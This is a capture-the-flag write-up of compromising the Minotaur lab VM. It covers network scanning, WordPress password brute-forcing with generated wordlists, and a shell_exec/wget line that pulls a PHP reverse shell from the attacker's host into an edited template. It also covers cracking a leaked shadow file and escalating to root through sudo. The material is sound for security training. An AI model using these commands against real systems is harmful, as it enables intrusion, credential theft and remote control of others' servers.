Mess with the Bull, Get the Horn
Time to catch up with the Sectalks CTF’s. First up, Minotaur (Sectalks BNE0x00)
"== Minotaur CTF ==
Minotaur is a boot2root CTF. Once you load the VM, treat it as a machine you can see on the network, i.e. you don't have physical access to this machine. Therefore, tricks like editing the VM's BIOS or Grub configuration are not allowed. Only remote attacks are permitted. There are a few flag.txt files around to grab. /root/flag.txt is your ultimate goal."
Let’s get hacking! First up, where is Minotaur hiding? Usually I would run arp or netdiscover to find the victim, however it’s not broadcasting that I can see. Let’s try ping sweeping:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
root@omerta:~# nmap -sn 192.168.56.0/24 Starting Nmap 7.00 ( https://nmap.org ) at 2015-12-06 18:42 AEST Nmap scan report for 192.168.56.1 Host is up (0.00014s latency). MAC Address: 00:50:56:C0:00:09 (VMware) Nmap scan report for 192.168.56.223 Host is up (0.00013s latency). MAC Address: 00:0C:29:7C:CF:9E (VMware) Nmap scan report for 192.168.56.254 Host is up (0.000079s latency). MAC Address: 00:50:56:FC:11:C7 (VMware) Nmap scan report for 192.168.56.130 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 15.20 seconds |
Gotcha! What ports are open?
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
root@omerta:~# nmap -sT -n -Pn -A --script vuln -v 192.168.56.223 ---snip--- Host is up (0.00043s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-cross-domain-policy: ERROR: Script execution failed (use -d to debug) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-fileupload-exploiter: |_http-frontpage-login: false |_http-server-header: Apache/2.4.7 (Ubuntu) | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | http://ha.ckers.org/slowloris/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 2020/tcp open ftp vsftpd 2.0.8 or later ---snip--- |
Let’s start with the low hanging fruit.. port 80.
Default apache page. Time to break open the fuzz….
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
root@omerta:~# wfuzz -c -z file,/usr/share/dirb/wordlists/big.txt --hc 404 http://192.168.56.223/FUZZ ******************************************************** * Wfuzz 2.0 - The Web Bruteforcer * ******************************************************** Target: http://192.168.56.223/FUZZ Payload type: file,/usr/share/dirb/wordlists/big.txt Total requests: 20469 ================================================================== ID Response Lines Word Chars Request ================================================================== 00012: C=403 10 L 30 W 290 Ch " - .htaccess" 00014: C=403 10 L 30 W 290 Ch " - .htpasswd" 03817: C=301 9 L 28 W 314 Ch " - bull" 16208: C=403 10 L 30 W 294 Ch " - server-status" |
Looks like we have a webapp at /bull. Let’s take a look:
Ummm… “Bulls are majestic animals. Such muscular beasts make me quiver.” Ummm… yeh…. whatever floats your boat ;)
What gets me excited about the page is this: “Proudly powered by WordPress”. Time to scan for known WP vulnerabilities. I have removed the vuln descriptions to keep the output short..
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
root@omerta:~# wpscan -e p,t,u -u http://192.168.56.223/bull/ [!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS) [!] Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection [!] Title: WordPress <= 4.2.3 - Timing Side Channel Attack [!] Title: WordPress <= 4.2.3 - Widgets Title Cross-Site Scripting (XSS) [!] Title: WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS) [!] Title: WordPress <= 4.2.3 - Legacy Theme Preview Cross-Site Scripting (XSS) [!] Title: WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS) [!] Title: WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS) [!] Title: WordPress <= 4.3 - Publish Post and Mark as Sticky Permission Issue [!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS) [!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload [!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS) [+] Enumerating usernames ... [+] Identified the following 1 user/s: +----+-------+-------+ | Id | Login | Name | +----+-------+-------+ | 1 | bully | bully | +----+-------+-------+ |
Plenty of vulnerabilities to check out, but first let’s see if we can go the easy route by bruteforcing bully’s password:
|
1 |
wpscan -u http://192.168.56.223/bull/ -U bully -w /usr/share/wordlists/rockyou.txt |
I cancelled this bruteforce attempt as the dictionary attack was going to take far too long. Looking at the CTF notes, we have these hints:
== Hints ==
This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.
One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.
Let’s try generating our own dictionary file based on the website’s content:
|
1 2 |
root@omerta:~# cewl -m 4 -w minotaur_dict.txt http://192.168.56.223/bull/ CeWL 5.1 Robin Wood (robin@digi.ninja) (http://digi.ninja) |
Take two.. this time with a much smaller wordlist.
|
1 2 3 4 5 6 7 8 |
root@omerta:~# wpscan -u http://192.168.56.223/bull/ -U bully -w /root/minotaur_dict.txt ---snip--- +----+-------+------+----------+ | Id | Login | Name | Password | +----+-------+------+----------+ | | bully | | | +----+-------+------+----------+ ---snip--- |
Still no joy.. this is bullshit. ;) Let’s use john to mangle our dictionary file:
|
1 2 3 |
root@omerta:~# john --wordlist=minotaur_dict.txt --rules --stdout > minotaur_dict2.txt Press 'q' or Ctrl-C to abort, almost any other key for status 18762p 0:00:00:00 100.00% (2015-12-06 20:20) 268028p/s Mailing |
Third try at brute forcing:
|
1 2 3 4 5 6 7 8 |
root@omerta:~# wpscan -u http://192.168.56.223/bull/ -U bully -w /root/minotaur_dict2.txt ---snip--- +----+-------+------+----------------+ | Id | Login | Name | Password | +----+-------+------+----------------+ | | bully | | Bighornedbulls | +----+-------+------+----------------+ ---snip--- |
Much better! We now have a log on to the WordPress site. Let’s see if we have edit privileges to the main index template:
We most certainly do. Time to add some exec code to download our PHP reverse shell.
shell_exec("wget 192.168.56.130/phpshell.txt ; mv phpshell.txt phpshell.php");
After updating the index template, we set up a simple netcat listener on port 1337, visit the index page to upload our shell, and execute the shell by visiting http://192.168.56.223/bull/phpshell.php:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
root@omerta:~# nc -nvlp 1337 listening on [any] 1337 ... connect to [192.168.56.130] from (UNKNOWN) [192.168.56.223] 45286 Linux minotaur 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux 07:35:14 up 1:53, 0 users, load average: 0.01, 2.53, 3.35 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ whoami;id;uname -a www-data uid=33(www-data) gid=33(www-data) groups=33(www-data) Linux minotaur 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux $ |
w00t! First shell!
Taking a look at www-data’s default directory, we can see our first flag.txt!
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
$ ls bull flag.txt index.html $ ls -al total 28 drwxr-xr-x 3 www-data www-data 4096 May 27 2015 . drwxr-xr-x 3 root root 4096 May 14 2015 .. drwxr-xr-x 5 www-data www-data 4096 Dec 7 07:34 bull -rw------- 1 www-data www-data 47 May 27 2015 flag.txt -rw-r--r-- 1 www-data www-data 11510 May 14 2015 index.html $ cat flag.txt Oh, lookey here. A flag! Th15 15 @N 3@5y f1@G! |
Next step.. let’s go to /tmp and download a simple script for automated enumeration. We can let this script run in the background while we search for unique or custom hacks.
|
1 2 |
$ cd /tmp $ ls |
Hang on a second! What do we have here?
|
1 2 3 4 5 6 |
flag.txt shadow.bak $ cat flag.txt That shadow.bak file is probably useful, hey? Also, you found a flag! My m1L|<$|-|@|<3 br1|\|G$ @11 t3h b0y$ 2 t3h y@R|) |
A second flag and a backup of the /etc/shadow file. It doesn’t get much better than this. Let’s use unshadow to generate our hash file, and pass it into john to see if we can get any creds:
|
1 2 3 4 5 6 7 8 9 10 |
root@omerta:~# unshadow passwd.txt shadow.txt > unshadow.txt root@omerta:~# john unshadow.txt Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt" Use the "--format=crypt" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Password1 (heffer) obiwan6 (minotaur) |
After about one minute, we get heffer’s password. Let’s log on and see what we have:
|
1 2 3 4 5 6 7 8 9 10 11 12 |
root@omerta:~# ssh heffer@192.168.56.223 ---snip--- heffer@minotaur:~$ ls -al total 28 drwx------ 3 heffer heffer 4096 May 27 2015 . drwxr-xr-x 5 root root 4096 May 27 2015 .. lrwxrwxrwx 1 heffer heffer 9 May 27 2015 .bash_history -> /dev/null -rw-r--r-- 1 heffer heffer 220 May 27 2015 .bash_logout -rw-r--r-- 1 heffer heffer 3637 May 27 2015 .bashrc drwx------ 2 heffer heffer 4096 May 27 2015 .cache -rw------- 1 heffer heffer 107 May 27 2015 flag.txt -rw-r--r-- 1 heffer heffer 675 May 27 2015 .profile |
Another flag! This time heffer’s:
|
1 2 3 |
heffer@minotaur:~$ cat flag.txt So this was an easy flag to get, hopefully. Have you gotten ~minotaur/flag.txt yet? Th3 fl@G 15: m00000 y0 |
First thing I always do is check if a user has sudo access, but in this case heffer has nothing exciting. I spend a couple of minutes pottering around the file system, only to be interrupted by john finding a second password. This time, minotaur’s. Let’s see what minotaur has to offer:
|
1 2 3 4 |
heffer@minotaur:/home$ su - minotaur Password: minotaur@minotaur:~$ ls flag.txt peda |
Minotaur’s flag!
|
1 2 3 4 5 |
minotaur@minotaur:~$ cat flag.txt Congrats! You've found the first flag: M355 W17H T3H 8ULL, G37 73H H0RN! But can you get /root/flag.txt ? |
Let’s check if minotaur has any sudo privileges:
|
1 2 3 4 5 6 7 |
minotaur@minotaur:~$ sudo -l Matching Defaults entries for minotaur on minotaur: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User minotaur may run the following commands on minotaur: (root) NOPASSWD: /root/bullquote.sh (ALL : ALL) ALL |
ALL : ALL… hello! Today is our lucky day.
|
1 2 3 4 5 6 |
minotaur@minotaur:~$ sudo bash [sudo] password for minotaur: root@minotaur:~# whoami;id;uname -a root uid=0(root) gid=0(root) groups=0(root) Linux minotaur 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux |
We have rooted the minotaur! Let’s raise the flag…
|
1 2 3 |
root@minotaur:/root# cat flag.txt Congrats! You got the final flag! Th3 Fl@g is: 5urr0nd3d bY @r$3h0l35 |
Thanks Bull for a fun challenge and for helping to get the Brisbane SecTalks off the ground.
Until next time, tight lines and happy hacking.